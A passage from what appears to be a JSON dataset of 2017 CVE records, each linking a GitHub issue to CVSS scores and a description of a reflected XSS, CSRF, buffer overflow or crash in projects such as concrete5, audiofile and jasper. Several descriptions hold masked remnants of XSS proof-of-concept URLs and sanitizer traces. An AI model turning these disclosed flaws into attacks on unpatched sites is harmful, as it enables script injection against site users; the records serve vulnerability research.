        "description": "out of bounds read in APITAG The attached file causes an out of bounds read detectable with asan in the function APITAG FILETAG Here's the address sanitizer error NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b at pc NUMBERTAG cdc bp NUMBERTAG ffe NUMBERTAG sp NUMBERTAG ffe NUMBERTAG READ of size NUMBERTAG at NUMBERTAG b thread T NUMBERTAG cdb in APITAG PATHTAG NUMBERTAG b in APITAG PATHTAG NUMBERTAG a2cb in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f0b NUMBERTAG c8c1e0 in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG b is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d NUMBERTAG c0 in calloc ( PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG cb NUMBERTAG in APITAG PATHTAG NUMBERTAG f4 in APITAG PATHTAG NUMBERTAG d in main PATHTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-6808",
        "Issue_Url_old": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/18",
        "Issue_Url_new": "https://github.com/paintballrefjosh/mangoswebv4/issues/18",
        "Repo_new": "paintballrefjosh/mangoswebv4",
        "Issue_Created_At": "2017-03-08T04:45:15Z",
        "description": "A Reflected XSS vulnerability in FILETAG . Hello: I have find a Reflected XSS vulnerability in FILETAG . The vulnerability exists due to insufficient filtration of user supplied data in \"id\" HTTP parameter that will be passed to PATHTAG \". The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6809",
        "Issue_Url_old": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/21",
        "Issue_Url_new": "https://github.com/paintballrefjosh/mangoswebv4/issues/21",
        "Repo_new": "paintballrefjosh/mangoswebv4",
        "Issue_Created_At": "2017-03-08T04:51:58Z",
        "description": "A Reflected XSS vulnerability in admin. FILETAG . Hello: I have find a Reflected XSS vulnerability in FILETAG . The vulnerability exists due to insufficient filtration of user supplied data in \"id\" HTTP parameter that will be passed to PATHTAG FILETAG \". The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6810",
        "Issue_Url_old": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/20",
        "Issue_Url_new": "https://github.com/paintballrefjosh/mangoswebv4/issues/20",
        "Repo_new": "paintballrefjosh/mangoswebv4",
        "Issue_Created_At": "2017-03-08T04:48:55Z",
        "description": "I have find a Reflected XSS vulnerability in FILETAG . Hello: I have find a Reflected XSS vulnerability in FILETAG . The vulnerability exists due to insufficient filtration of user supplied data in \"linkid \" HTTP parameter that will be passed to \" PATHTAG FILETAG \". The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6811",
        "Issue_Url_old": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/19",
        "Issue_Url_new": "https://github.com/paintballrefjosh/mangoswebv4/issues/19",
        "Repo_new": "paintballrefjosh/mangoswebv4",
        "Issue_Created_At": "2017-03-08T04:46:51Z",
        "description": "A Reflected XSS vulnerability in FILETAG . Hello: I have find a Reflected XSS vulnerability in FILETAG . The vulnerability exists due to insufficient filtration of user supplied data in \"id\" HTTP parameter that will be passed to \" PATHTAG \". The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6812",
        "Issue_Url_old": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/17",
        "Issue_Url_new": "https://github.com/paintballrefjosh/mangoswebv4/issues/17",
        "Repo_new": "paintballrefjosh/mangoswebv4",
        "Issue_Created_At": "2017-03-08T04:43:45Z",
        "description": "A Reflected XSS vulnerability in FILETAG . Hello: I have find a Reflected XSS vulnerability in FILETAG . The vulnerability exists due to insufficient filtration of user supplied data in \"id\" HTTP parameter that will be passed to \" PATHTAG \". The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6829",
        "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/33",
        "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/33",
        "Repo_new": "mpruett/audiofile",
        "Issue_Created_At": "2017-02-20T16:37:33Z",
        "description": "global buffer overflow in APITAG APITAG URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6830",
        "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/34",
        "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/34",
        "Repo_new": "mpruett/audiofile",
        "Issue_Created_At": "2017-02-20T16:38:01Z",
        "description": "heap based buffer overflow in alaw2linear_buf APITAG URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6831",
        "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/35",
        "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/35",
        "Repo_new": "mpruett/audiofile",
        "Issue_Created_At": "2017-02-20T16:38:25Z",
        "description": "heap based buffer overflow in APITAG APITAG URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6832",
        "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/36",
        "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/36",
        "Repo_new": "mpruett/audiofile",
        "Issue_Created_At": "2017-02-20T16:38:50Z",
        "description": "heap based buffer overflow in APITAG APITAG URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6833",
        "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/37",
        "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/37",
        "Repo_new": "mpruett/audiofile",
        "Issue_Created_At": "2017-02-20T16:39:16Z",
        "description": "divide by zero in APITAG APITAG URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6834",
        "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/38",
        "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/38",
        "Repo_new": "mpruett/audiofile",
        "Issue_Created_At": "2017-02-20T16:39:45Z",
        "description": "heap based buffer overflow in ulaw2linear_buf APITAG URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6835",
        "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/39",
        "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/39",
        "Repo_new": "mpruett/audiofile",
        "Issue_Created_At": "2017-02-20T16:40:01Z",
        "description": "divide by zero in APITAG APITAG URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6836",
        "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/40",
        "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/40",
        "Repo_new": "mpruett/audiofile",
        "Issue_Created_At": "2017-02-20T16:40:17Z",
        "description": "heap based buffer overflow in APITAG APITAG URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6837",
        "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/41",
        "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/41",
        "Repo_new": "mpruett/audiofile",
        "Issue_Created_At": "2017-02-20T16:40:30Z",
        "description": "multiple ubsan crashes. URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6850",
        "Issue_Url_old": "https://github.com/mdadams/jasper/issues/112",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/112",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2017-01-18T16:18:54Z",
        "description": "NULL pointer dereference in jp2_cdef_destroy (jp2_cod.c). On NUMBERTAG ERRORTAG Testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6851",
        "Issue_Url_old": "https://github.com/mdadams/jasper/issues/113",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/113",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2017-01-21T16:36:38Z",
        "description": "invalid memory read in jas_matrix_bindsub (jas_seq.c). On NUMBERTAG ERRORTAG Testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6852",
        "Issue_Url_old": "https://github.com/mdadams/jasper/issues/114",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/114",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2017-01-25T08:28:04Z",
        "description": "heap based buffer overflow in jpc_dec_decodepkt (jpc_t2dec.c). On NUMBERTAG ERRORTAG Testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-6905",
        "Issue_Url_old": "https://github.com/concrete5/concrete5-legacy/issues/1947",
        "Issue_Url_new": "https://github.com/concretecms/concrete5-legacy/issues/1947",
        "Repo_new": "concretecms/concrete5-legacy",
        "Issue_Created_At": "2017-03-13T17:44:36Z",
        "description": "concrete5 \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: concrete5 Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in \u201cconcrete NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP GET parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6906",
        "Issue_Url_old": "https://github.com/Xtraball/SiberianCMS/issues/217",
        "Issue_Url_new": "https://github.com/xtraball/siberian/issues/217",
        "Repo_new": "xtraball/siberian",
        "Issue_Created_At": "2017-03-08T14:22:40Z",
        "description": "APITAG \u2013 Cross Site Scripting (XSS). Product: APITAG Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in APITAG NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201clog\u201d HTTP GET parameter passed to the the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6907",
        "Issue_Url_old": "https://github.com/Overv/Open.GL/issues/56",
        "Issue_Url_new": "https://github.com/overv/open.gl/issues/56",
        "Repo_new": "overv/open.gl",
        "Issue_Created_At": "2017-03-13T17:48:44Z",
        "description": "Open.GL \u2013 Cross Site Scripting (XSS). Product: Open.GL Download: FILETAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in APITAG latest version\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201ccontent\u201d HTTP GET parameter passed to the APITAG APITAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6908",
        "Issue_Url_old": "https://github.com/concrete5/concrete5-legacy/issues/1948",
        "Issue_Url_new": "https://github.com/concretecms/concrete5-legacy/issues/1948",
        "Repo_new": "concretecms/concrete5-legacy",
        "Issue_Created_At": "2017-03-13T17:45:51Z",
        "description": "concrete5 \u2013 Cross Site Scripting (XSS) in APITAG Product: concrete5 Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in \u201cconcrete NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the APITAG HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6909",
        "Issue_Url_old": "https://github.com/shish/shimmie2/issues/597",
        "Issue_Url_new": "https://github.com/shish/shimmie2/issues/597",
        "Repo_new": "shish/shimmie2",
        "Issue_Created_At": "2017-03-03T17:19:36Z",
        "description": "Shimmie \u2013 Cross Site Scripting (XSS) . Product: Shimmie Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered APITAG NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201clog\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6914",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/275",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/275",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2017-03-15T08:07:56Z",
        "description": "Multiple Security Issue of CSRF at Few Parameters. ' Exploit Title : Multiple Security Issue of CSRF at Few Parameters ' Vulnerability Type : Cross Site Request Forgery (CAPEC NUMBERTAG CVETAG ) ' Reporting Date NUMBERTAG Author : MENTIONTAG MENTIONTAG MENTIONTAG ' Vendor Homepage : FILETAG ' Software Link : URLTAG ' Version NUMBERTAG and NUMBERTAG I. Abstract As quoted from the official site of APITAG CMS, APITAG CMS is an open source content management system built on PHP and APITAG It was created by \u2013 and for \u2013 user experience and content strategy experts. APITAG user system is designed for a single webmaster or large distributed teams. Users can be editors or publishers of a single page or the entire site. II. Introduction NUMBERTAG Cross Site Request Forgery (CSRF) Generally, CSRF is an attack that \u201cforces\u201d a user to do something that is basically \u201cunwanted\u201d in a web based application by utilizing the circumstance of the victim that is being authorized (login). In general, this kind of attack could be used because the absence of authentication process in doing a change or the absence of unique token that can allowed to process the related matter (the uniqueness of the token is usually given so the user wouldn\u2019t be troubled by typing password to changes that are not quite significant). In this situation, the problem related lack of CSRF token could be found at a few features such as Colophon Changing (like a feature to change a web footer easily), User Deletion, and Navigation Social Changing (changing the URL to the malicious one). Please kindly note , as we learn a few things at APITAG CMS, we found that the protection is given with the needs of APITAG header of the HTTP/S Request. For example, when we tried to do a APITAG of CSRF at the APITAG User\u201d Feature, the feature needs the APITAG parameter to \u201ccompletely finishing\u201d the APITAG But at those NUMBERTAG three) mentioned feature, the protection is not given yet NUMBERTAG Colophon Feature In simple, this feature allows the users to write their own footer at the sidebar. By default, the value of Colophon is APITAG on APITAG CMS\" with embedded URL at the Product Name NUMBERTAG Nav Soc Feature APITAG Social) The feature allows the users to put their own social network with the provided URL and logos to the sidebar that exist at the application. III. Summary of Issue As it has been delivered before, the security problem in this report has a relation with APITAG of CSRF Token\u201d at separated parameter that could affects some changes like NUMBERTAG Deleting the Registered User (both of NUMBERTAG and NUMBERTAG Change the Colophon Information (both of NUMBERTAG and NUMBERTAG and NUMBERTAG Change the Navigation Social (both of NUMBERTAG and NUMBERTAG IV. Information and Situation of this APITAG To be able to understand the existed problem, this section will be re explaining the problem specifically about some information which is related to the general running process or even the root of the existed problem NUMBERTAG Deleting the Registered User with CSRF APITAG at Document NUMBERTAG Change the Colophon with CSRF APITAG at Document NUMBERTAG Change the Navigation Social with CSRF APITAG at Document). V. Additional Information NUMBERTAG For completing the explanation, the APITAG explanation are completed by the videos APITAG at Youtube, provided at document and via direct email to Tim NUMBERTAG And also the script that could be used to execute the APITAG ( provided at Document and via direct email to Tim). VI. References NUMBERTAG PCI DSS NUMBERTAG point NUMBERTAG for CSRF NUMBERTAG CAPEC NUMBERTAG Cross Site Request Forgery CVETAG NUMBERTAG CVETAG : Cross Site Request Forgery CVETAG NUMBERTAG URLTAG NUMBERTAG URLTAG VII. Document: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 4.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6958",
        "Issue_Url_old": "https://github.com/mantisbt-plugins/source-integration/issues/205",
        "Issue_Url_new": "https://github.com/mantisbt-plugins/source-integration/issues/205",
        "Repo_new": "mantisbt-plugins/source-integration",
        "Issue_Created_At": "2017-03-16T16:29:10Z",
        "description": "XSS in search page. Dmitry Ivanov d1m0ck URLTAG reported NUMBERTAG a security vulnerability in the Source Integration plugin's search results page, allowing an attacker to inject arbitrary HTML or javascript code (the latter, only if APITAG default CSP are disabled NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-6967",
        "Issue_Url_old": "https://github.com/neutrinolabs/xrdp/issues/350",
        "Issue_Url_new": "https://github.com/neutrinolabs/xrdp/issues/350",
        "Repo_new": "neutrinolabs/xrdp",
        "Issue_Created_At": "2016-03-23T12:44:53Z",
        "description": "Homedir gets not correctly created at first login. I'm opening this as a new issue, although my problems have already been started to be discussed at NUMBERTAG which has been marked as \"closed\" before finding a solution for my specific problem. Short summary here: I built xrdp upstream version and have a problem when connecting to the server for the very first time with a user. The server should then create a homedir (via pam_mkhomedir). The server is a member of an active directory, PAM is configured to authenticate via samba/winbind and create home directories for users on their first login. This works perfectly for e.g. ssh or other services but not for xrdp. I had a look at bugs NUMBERTAG and NUMBERTAG which seem similar but have a different background. The problem of these referenced bugs is that VNC needs some time to start up before connecting to it so a timeout (loop) has been implemented. This is not the case here. In this bug, VNC starts but there seems to be a problem with the order a full PAM based authentification. xrdp is supposed to first do the PAM authentication (which would initially creating a users' home directory) and then start VNC. This seems not to work as expected somehow... In general, the home directory gets created somewhen, but obviously too late in the process so that VNC spits out the error lines ERRORTAG If I kill the Xvnc process (or completely restart xrdp) and try it again (after the homedir got created while the first login try), it works. If I create the user's home directory manually it also works. I wasn't able to let PAM create the homedir before VNC starts, I tried almost every possible order of \"session\" entries (especially those with pam_mkhomedir.so at the beginning).",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
        "severity": "HIGH",
        "baseScore": 7.3,
        "impactScore": 3.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-7202",
        "Issue_Url_old": "https://github.com/slims/slims7_cendana/issues/50",
        "Issue_Url_new": "https://github.com/slims/slims7_cendana/issues/50",
        "Repo_new": "slims/slims7_cendana",
        "Issue_Created_At": "2017-03-03T17:35:23Z",
        "description": "APITAG NUMBERTAG Cendana \u2013 Multiple Cross Site Scripting (XSS) . Product: APITAG NUMBERTAG Cendana Download: URLTAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered APITAG NUMBERTAG Cendana latest version\u201d, which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in the \u201cid\u201d HTTP GET parameter passed to the PATHTAG and PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7203",
        "Issue_Url_old": "https://github.com/ZoneMinder/ZoneMinder/issues/1797",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/1797",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2017-02-28T14:49:23Z",
        "description": "APITAG Cross Site Scripting (XSS). APITAG Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in APITAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in APITAG HTTP POST parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: Post: APITAG APITAG < To FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7204",
        "Issue_Url_old": "https://github.com/tboothman/imdbphp/issues/88",
        "Issue_Url_new": "https://github.com/tboothman/imdbphp/issues/88",
        "Repo_new": "tboothman/imdbphp",
        "Issue_Created_At": "2017-02-27T18:18:59Z",
        "description": "imdbphp (lastest version) Cross Site Scripting (XSS). Product\uff1aimdbphp Download: URLTAG Vunlerable Version: lastest version and probably prior Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in \u201cimdbphp\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in \u201cname\u201d HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7205",
        "Issue_Url_old": "https://github.com/devryan/GamePanelX-V3/issues/161",
        "Issue_Url_new": "https://github.com/devryan/gamepanelx-v3/issues/161",
        "Repo_new": "devryan/gamepanelx-v3",
        "Issue_Created_At": "2017-03-02T16:59:10Z",
        "description": "APITAG NUMBERTAG Cross Site Scripting (XSS). Product: APITAG NUMBERTAG Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered APITAG NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201ca\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7231",
        "Issue_Url_old": "https://github.com/Tatsh/pngdefry/issues/1",
        "Issue_Url_new": "https://github.com/tatsh/pngdefry/issues/1",
